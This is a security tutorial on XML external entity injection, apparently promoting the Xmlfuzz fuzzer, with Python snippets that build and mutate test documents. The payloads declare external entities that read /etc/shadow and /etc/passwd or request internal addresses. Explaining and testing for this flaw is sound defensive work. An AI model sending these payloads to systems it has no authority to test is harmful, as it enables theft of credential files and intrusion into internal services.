Finding XML Entity Injection Problems
XML is a wonderful specification but can be very insecure if misused. I personally believe that XML is insecure because its over-complicated abstractions allow you to do a lot of things painlessly but also open the gates to all sorts of problems. One such class of problems is known as entity injection attacks.
What Is Entity Injection
Entity injection is a well-known and very old trick that allows an attacker to insert XML entities (a special mechanism in XML) into XML documents and, as such, access arbitrary resources. XML entities come in the format &entityname; and effectively act as text replacement. For example, if the entity &name; is linked to the text John, the XML document <doc>Hello &name;!</doc> will effectively become <doc>Hello John!</doc>. This is just one of the trivial cases, but there is so much more one can do.
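The text replacement described above can be observed with a few lines of Python. This is only a minimal sketch: it assumes the standard library's xml.etree.ElementTree parser, and the internal entity declaration in the DTD section is added here for illustration, since an entity has to be declared somewhere before it can be used.

```python
import xml.etree.ElementTree as ET

# The entity "name" is declared in the document's own DTD section
# and linked to the text "John".
document = """<!DOCTYPE doc [
  <!ENTITY name "John">
]>
<doc>Hello &name;!</doc>"""

root = ET.fromstring(document)

# The parser has already replaced &name; with its text.
expanded_text = root.text
print(expanded_text)
```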
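The more severe kind of entity injection is when SYSTEM entities, a.k.a. external entities, are in use. A system entity is declared at the top of the document as part of the DTD section, in the form <!ENTITY name SYSTEM "URI">, where the URI points to the resource whose contents replace the entity.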
If the DTD declaration is processed, which is the default behaviour in many frameworks, then an attacker may be able to access any file from the local file system and sometimes even make arbitrary HTTP requests to internal servers. As you may have guessed already, this is a severe attack that often leads to a full compromise of the target system.
How To Find XML Entity Injection Problems
Identifying entity injection is a relatively straightforward process. It works by simply constructing a document with a valid DTD declaration that contains at least one external entity. In the body of the document we simply try to use the entity name in various ways in order to achieve the desired effect. For example, a document that declares an external entity pointing at the /etc/shadow file and references that entity in its body could potentially be used to read the contents of the file, provided the remote server is vulnerable and the contents of the entity are echoed back to the user.
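As a rough sketch of what such a test document might look like, the Python snippet below builds one as a string. The function name build_probe, the root element doc and the entity name xxe are all hypothetical choices made for this illustration; a real target will expect its own document structure.

```python
def build_probe(root_tag: str, target_uri: str, entity_name: str = "xxe") -> str:
    """Return an XML document whose body references an external entity.

    All names here are illustrative assumptions, not a fixed format.
    """
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE {root_tag} [\n"
        f'  <!ENTITY {entity_name} SYSTEM "{target_uri}">\n'
        "]>\n"
        f"<{root_tag}>&{entity_name};</{root_tag}>"
    )


# Build a document that asks the parser to pull in /etc/shadow.
probe = build_probe("doc", "file:///etc/shadow")
print(probe)
```

If the server parses this document with external entities enabled and echoes the content of the root element back, the response would contain the file instead of the entity reference.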
To test complex XML structures we need not only to vary the URI the entity is pointing to, in order to avoid security filters, but also to use the entity on its own, in combination with valid data within elements, or inside element attributes. This exercise can quickly get very complex and tedious, especially with large documents, and this is why the best way to find this particular kind of vulnerability is to use a fuzzer.
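To give a feel for how quickly the combinations multiply, here is a small Python sketch that crosses a handful of URI spellings with the three placements mentioned above. The URI list, the item element and the entity name xxe are assumptions picked for the example only.

```python
from itertools import product

# Hypothetical URI spellings to try against filters.
TARGET_URIS = [
    "file:///etc/passwd",
    "/etc/passwd",
    "http://127.0.0.1:8080/",
]

# The entity on its own, mixed with valid data, and inside an attribute.
# Note: the XML specification forbids external entity references in
# attribute values, so a strict parser should reject the last form.
PLACEMENTS = {
    "alone": "<item>&xxe;</item>",
    "mixed": "<item>valid &xxe; data</item>",
    "attribute": '<item id="&xxe;">valid data</item>',
}


def generate_variants(uris, placements):
    """Yield (placement label, uri, document) for every combination."""
    for uri, (label, body) in product(uris, placements.items()):
        document = f'<!DOCTYPE item [<!ENTITY xxe SYSTEM "{uri}">]>\n{body}'
        yield label, uri, document


variants = list(generate_variants(TARGET_URIS, PLACEMENTS))
print(len(variants), "documents to try")
```

Three URIs and three placements already give nine documents for a single element, which is why doing this by hand does not scale.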
Using a Fuzzer
This is where Xmlfuzz enters the picture. Xmlfuzz is a smart XML fuzzer, which works by first understanding the structure of an XML document and then trying various combinations of invalid input in order to find vulnerabilities, including the XML entity injection kind. This is done by recursively walking the tree structure of the XML document and injecting pieces of data that we know could result in abnormal behaviour.
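The general idea of walking the tree and injecting at each node can be sketched in Python as follows. This is not Xmlfuzz's actual implementation, only an illustration of the technique under a few assumptions: the input has no namespaces, only element text is mutated, and the names inject_entity, element_at and MARKER are made up for this example.

```python
import copy
import xml.etree.ElementTree as ET

# Placeholder swapped for the entity reference after serialization,
# because the serializer would otherwise escape the "&".
MARKER = "__ENTITY_MARKER__"


def element_at(root, path):
    """Follow a list of child indexes from root down to one element."""
    node = root
    for index in path:
        node = node[index]
    return node


def inject_entity(xml_text, entity_uri, entity_name="xxe"):
    """Return one mutated document per element in the tree."""
    root = ET.fromstring(xml_text)
    doctype = (
        f"<!DOCTYPE {root.tag} "
        f'[<!ENTITY {entity_name} SYSTEM "{entity_uri}">]>\n'
    )
    variants = []

    def walk(path):
        # Mutate a copy so every variant differs from the original
        # document in exactly one place.
        mutated = copy.deepcopy(root)
        element_at(mutated, path).text = MARKER
        serialized = ET.tostring(mutated, encoding="unicode")
        variants.append(doctype + serialized.replace(MARKER, f"&{entity_name};"))
        # Recurse into the children of the original element.
        for child_index in range(len(element_at(root, path))):
            walk(path + [child_index])

    walk([])
    return variants


sample = "<order><id>1</id><customer><name>Ann</name></customer></order>"
fuzzed = inject_entity(sample, "file:///etc/passwd")
for document in fuzzed:
    print(document)
```

Each returned document could then be placed in the body of the original HTTP request and sent to the target, with the responses compared against a baseline.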
The process works swiftly even on very large and complex documents. It can also be repeated as many times as we want on documents that have already been fuzzed once in order to uncover more interesting scenarios, a feature known as second-level fuzzing. Xmlfuzz is straightforward to use. The tool takes just a valid HTTP request with a valid XML document as part of the request body. The rest is done automatically for your convenience.
For more information and a walkthrough of how to start a fuzz, simply follow the "Fuzzing XML" article on the Websecurify Learning Portal.